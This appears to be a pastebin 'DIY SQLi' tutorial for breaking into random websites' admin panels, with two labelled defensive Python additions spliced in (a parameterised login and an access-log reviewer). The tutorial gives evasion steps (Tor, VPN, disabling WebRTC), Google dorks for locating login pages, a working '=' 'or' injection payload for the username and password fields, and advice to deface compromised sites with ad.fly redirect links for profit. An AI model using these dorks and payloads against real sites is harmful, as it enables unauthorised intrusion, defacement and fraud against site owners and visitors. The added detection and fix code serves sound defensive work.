nabz

diy sql

Jan 9th, 2017
+-==============================================================-+
|                     DIY Guide >>> SQLi <<<                     |
|                 A N O F F I C I A L G U I D E                  |
+-==============================================================-+
| Vulnerability Disclosure:                                      |
| The vulnerability is located in the `username` and `password`  |
| input field values of the `login` module. Remote attackers are |
| able to execute their own SQL commands by manipulating the GET |
| method request with the vulnerable username and password       |
| parameters. The request method to inject the SQL command is    |
| GET and the issue is located on the application-side of the    |
| online-service. The SQL vulnerability allows an attacker to    |
| remotely gain unauthorized access to the account system of the |
| content management system.                                     |
+-==============================================================-+
| Request Method(s):                                             |
|   [+] GET                                                      |
| Vulnerable Module(s):                                          |
|   [+] Login                                                    |
| Vulnerable Parameter(s):                                       |
|   [+] username                                                 |
|   [+] password                                                 |
+-==============================================================-+
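
A defender's view of the fix for the login flaw described above, as an added example that is not part of the original paste. It uses Python with an in-memory SQLite table standing in for the page's PHP login module; the `users` schema, the function names and the sample account are assumptions. The handler accepts credentials only via POST, binds the username as a query parameter, and keeps the password out of the SQL statement entirely.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db():
    """Constructed in-memory user table holding one sample account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, hash_password("correct horse", salt)))
    return db


def login(db, method, form):
    """Return True only for a POST whose credentials match a stored account."""
    if method != "POST":
        return False  # credentials must never travel in a GET query string
    username = form.get("username", "")
    password = form.get("password", "")
    # The username is bound as a parameter: quotes inside it stay data and
    # cannot change the structure of the statement.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        hash_password(password, b"\0" * 16)  # same work for unknown users
        return False
    salt, pw_hash = row
    # The password is hashed and compared in application code, not in SQL.
    return hmac.compare_digest(hash_password(password, salt), pw_hash)


if __name__ == "__main__":
    db = make_db()
    print(login(db, "POST", {"username": "admin", "password": "correct horse"}))
    print(login(db, "POST", {"username": "'=' 'or'", "password": "'=' 'or'"}))
```
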
|                           Tutorial                           |
|                                                              |
| In this tutorial we will be pen testing random administration  |
| panels from around the world. This is a method pen-testers use |
| to bypass weak CMS/admin panels. This method requires no       |
| experience.                                                    |
|                                                                |
| 1.) Protect your IP# from being logged:                        |
| Hacking like this is illegal, so taking the risk is entirely   |
| up to you; I take no responsibility. For educational purposes  |
| only.                                                          |
|                                                                |
| OK, before we begin you need to protect your IP# from being    |
| logged by the server you're about to hack into. For this we're |
| gonna need a proxy/VPN (Virtual Private Network). I'd suggest  |
| using Tor if you have it; if not, I would recommend using      |
| Hotspot Shield for this tutorial (it's free)                   |
| https://www.hotspotshield.com/                                 |
|                                                                |
| IP Test:                                                       |
| http://whatismyipaddress.com/                                  |
| To test your IP, turn on your proxy/VPN and refresh the page   |
| above. If your IP# changes, you're good. If not, try again     |
| until it does.                                                 |
|                                                                |
| Next you need to disable WebRTC in your web browser to prevent |
| your VPN from leaking your REAL IP address.                    |
| http://hackforums.net/showthread.php?tid=4682819               |
|                                                                |
| 2.) Go to Google & search:                                     |
| intitle:Admin inurl:login.php site:.com                        |
|                                                                |
| ***Screenshot: http://i.imgur.com/6FKY2xS.jpg***               |
| ^^This will be your main dork. You can modify it to find more  |
| vulnerable admin panels.                                       |
|                                                                |
| EXAMPLES:                                                      |
| intitle:Admin inurl:login.php site:.net                        |
| intitle:Admin inurl:login.php site:.org                        |
| intitle:Admin inurl:login.php site:.uk                         |
| intitle:Admin inurl:login.php site:.br                         |
|                                                                |
| To find more web country codes, go to:                         |
| http://goes.gsfc.nasa.gov/text/web_country_codes.html          |
|                                                                |
| Other dork extensions you could try:                           |
| inurl:/admin_login                                             |
| inurl://admin/_login.php                                       |
| inurl://panel/admin.php                                        |
| inurl://admin/admin_login.php                                  |
| inurl://administracao/                                         |
| inurl://admin/autentica/loga.php                               |
|                                                                |
| 3.) Locating vulnerable admin panels:                          |
| Locating vulnerable admin panels is a slow process and         |
| requires a little patience but the payout is half the fun.     |
| Enter your Google dork (posted above). Starting at page 1 in   |
| Google (Right-Click > Open link in new tab), start clicking on |
| links one by one until you have 5-10 tabs open in your         |
| browser.                                                       |
|                                                                |
| 4.) Skeleton Key:                                              |
| USERNAME: '=' 'or'                                             |
| PASSWORD: '=' 'or'                                             |
|                                                                |
| Once at the admin panel, enter your Skeleton Key in an attempt |
| to bypass:                                                     |
| ***Screenshot: http://i.imgur.com/04mGZ0Q.jpg***               |
| ***Screenshot: http://i.imgur.com/K3IxjkX.jpg***               |
|                                                                |
| 5.) Demos:                                                     |
|                                                                |
| That's it! Once you're in the admin panel you can start        |
| editing the site. To take advantage of this, replace links,    |
| banners, directories, etc. with your ad.fly: link to redirect  |
| users and earn money.                                          |
+-==============================================================-+
(c) mObiIe | Edited Tutorial 2012
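
Because the disclosure above places the injection in the `username` and `password` parameters of a GET request, every attempt is recorded in the web server's access log. The following added example (not part of the original paste) reviews such a log for login parameters carried in the URL and for SQL syntax inside them; the combined log format, the sample lines with documentation IP addresses, and the reason labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [09/Jan/2017:10:01:12 +0000] "GET /admin/login.php?username=%27%3D%27+%27or%27&password=%27%3D%27+%27or%27 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jan/2017:10:02:40 +0000] "GET /login.php?username=alice&password=hunter2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jan/2017:10:03:05 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [09/Jan/2017:10:04:19 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
CRED_PARAMS = ("username", "password")  # parameter names from the disclosure
# A quote next to a comparison or boolean operator, in either order.
SQL_SYNTAX = re.compile(r"'\s*(=|or\b|and\b|--|;|#)|(=|\bor|\band)\s*'", re.I)


def review(log_text):
    """Return one finding per request that carries login parameters in the URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        values = [v for name in CRED_PARAMS for v in params.get(name, [])]
        if not values:
            continue
        reasons = ["credentials-in-url"]  # a finding even without injection
        if any(SQL_SYNTAX.search(v) for v in values):
            reasons.append("sql-syntax-in-credential")
        findings.append({"ip": ip, "path": url.path,
                         "status": int(status), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_LOG):
        print(finding)
```

The HTTP status is kept in each finding so an analyst can check whether a flagged request was followed by a redirect into the admin area; what a given status means depends on the application.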